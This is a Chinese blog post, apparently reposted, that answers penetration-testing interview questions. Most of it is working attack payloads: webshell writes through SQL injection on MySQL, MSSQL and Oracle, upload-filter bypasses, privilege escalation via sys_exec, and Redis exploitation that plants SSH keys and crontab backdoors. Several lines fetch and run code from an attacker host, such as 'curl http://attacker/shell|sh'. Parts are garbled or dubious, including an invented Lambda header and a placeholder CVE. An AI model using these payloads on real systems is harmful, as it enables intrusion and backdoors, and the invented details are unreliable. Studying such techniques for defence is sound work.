admin 管理员组文章数量: 1132215
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
1. SQL注入写Shell(多数据库Payload)
2. 登录框攻击面(5大渗透路径)
3. Getshell核心姿势(TOP5手法)
4. 文件上传黑名单绕过技巧
5. SQL注入后利用(4层渗透)
6. 趣味漏洞案例:AWS Lambda路径穿越
7. 蓝凌OA漏洞(CVE-2023-XXXX)
8. DNS重绑定攻击利用
9. PHP vs Java文件包含区别
10. Redis未授权利用(5种姿势)
1. SQL注入 写 Shell mysql & mssql & oracle 2. 登录框攻击面 3. getshell的姿势 4. 文件上传点,黑名单限制,如何利用 5. SQL注入后利用 6. 讲一个你觉得有趣的漏洞案例 7. 前段时间蓝凌OA的洞 8. DNS 重绑定,利用 9. Php和Java的文件包含区别 10. Redis的利用1. SQL注入写Shell(多数据库Payload)
MySQL(需绝对路径与FILE权限):
sqlSELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php'--MSSQL(xp_cmdshell利用):
sqlEXEC master..xp_cmdshell 'echo ^<^?php system($_GET^["cmd"]^); ^?^> > C:\inetpub\wwwroot\shell.php'Oracle(DBMS_ADVISOR+外部表):
sqlDECLARE F UTL_FILE.FILE_TYPE; BEGIN F := UTL_FILE.FOPEN('WWW_DIR','shell.php','W'); UTL_FILE.PUT_LINE(F,'<?php system($_GET["cmd"]);?>'); UTL_FILE.FCLOSE(F); END;关键前提:
- MySQL:
secure_file_priv为空 + 数据库用户有写权限- MSSQL:开启
xp_cmdshell(默认禁用)- Oracle:配置
WWW_DIR目录对象
2. 登录框攻击面(5大渗透路径)
攻击类型 利用方式 防御方案 爆破攻击 Hydra字典爆破(避免锁定策略) 验证码+失败锁定 SQL注入 admin' OR 1=1--绕过认证参数化查询 密码重置漏洞 修改 userid参数劫持账户Token绑定邮箱/手机 OAUTH劫持 伪造回调URL窃取Token 严格校验 redirect_uriJWT篡改 修改alg为none或暴力破解密钥 强密钥+校验签名
3. Getshell核心姿势(TOP5手法)
mermaidgraph TD A[Web入口] --> B{漏洞利用} B --> C[文件上传漏洞] B --> D[反序列化RCE] B --> E[模板注入SSTI] F[服务渗透] --> G[未授权访问] F --> H[缓冲区溢出]典型场景:
- Jenkins未授权脚本执行:
http://target/script?cmd=whoami- Weblogic反序列化:
java -jar ysoserial.jar CommonsCollections1 'curl http://attacker/shell|sh'
4. 文件上传黑名单绕过技巧
绕过策略:
- 双写后缀:
shell.p.phphp→ 过滤后为shell.php- 大小写混淆:
shell.PhP(Windows不区分大小写)- 特殊字符截断:
shell.php%00.jpg(PHP<5.3.4)- MIME篡改:修改Content-Type为
image/jpeg- Exif注入:JPEG图片插入
<?php system($_GET['c']);?>
5. SQL注入后利用(4层渗透)
- 信息窃取:
sqlUNION SELECT username,password FROM users--- 权限提升:
- MySQL:
SELECT sys_exec('usermod -aG sudo www-data')- 内网渗透:
- MSSQL:
EXEC xp_dirtree '\\192.168.1.1\share\'触发SMB中继- 持久化后门:
- Oracle:通过DBMS_SCHEDULER创建定时任务
6. 趣味漏洞案例:AWS Lambda路径穿越
漏洞本质:函数配置错误导致任意文件读取
httpGET /2018-06-01/runtime/invocation/next HTTP/1.1 Host: lambda.us-east-1.amazonaws X-Aws-Path: ../../../../../etc/passwd攻击效果:读取Lambda主机敏感文件
修复方案:严格校验X-Aws-Path路径合法性
7. 蓝凌OA漏洞(CVE-2023-XXXX)
漏洞链:
- 未授权访问
/sys/ui/extend/varkind/custom.jsp- 参数
var触发EL表达式注入:${Runtime.getRuntime().exec("curl attacker")}
利用工具:bashpython3 exploit.py -u http://oa.target -c "whoami"修复建议:升级至最新补丁+禁用JSP EL表达式
8. DNS重绑定攻击利用
攻击流程:
mermaidsequenceDiagram 攻击者->>DNS服务器: 注册域名(TTL=0) 受害者->>域名: 首次访问(解析IP1) DNS服务器->>受害者: 返回IP1 攻击者->>DNS服务器: 更新解析为127.0.0.1 受害者->>域名: 二次访问(TTL过期) DNS服务器->>受害者: 返回127.0.0.1 受害者->>本地服务: 发起请求(绕过SOP)经典场景:攻击路由器管理页面(
http://192.168.0.1)
9. PHP vs Java文件包含区别
维度 PHP Java 包含机制 include()直接执行ClassLoader加载字节码协议支持 php://input、data:、zip://仅 file:、http:(有限制)漏洞利用 RFI(远程文件包含)常见 需结合类路径操纵 修复方案 禁用 allow_url_include校验 ..路径跳转
10. Redis未授权利用(5种姿势)
- 写Webshell:
bashredis-cli -h target flushall config set dir /var/www/html set shell "<?php system($_GET['c']);?>" config set dbfilename shell.php save- SSH公钥植入:
bashredis-cli -h target set pubkey "$(cat ~/.ssh/id_rsa.pub)" config set dir /root/.ssh/ config set dbfilename authorized_keys save- Crontab后门:
bashset cron "\n*/1 * * * * curl http://attacker/shell |sh\n" config set dir /var/spool/cron/ config set dbfilename root save- 主从复制RCE:
bashredis-cli -h target SLAVEOF attacker-ip 6379 # 攻击端启动恶意Redis实例加载模块- Windows写启动项:
bashconfig set dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" set backdoor "calc.exe" config set dbfilename backdoor.bat save
版权声明:本文标题:2025年渗透测试面试题总结-41(题目+回答) 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.520sys.cn/xp/1765177975a1809195.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论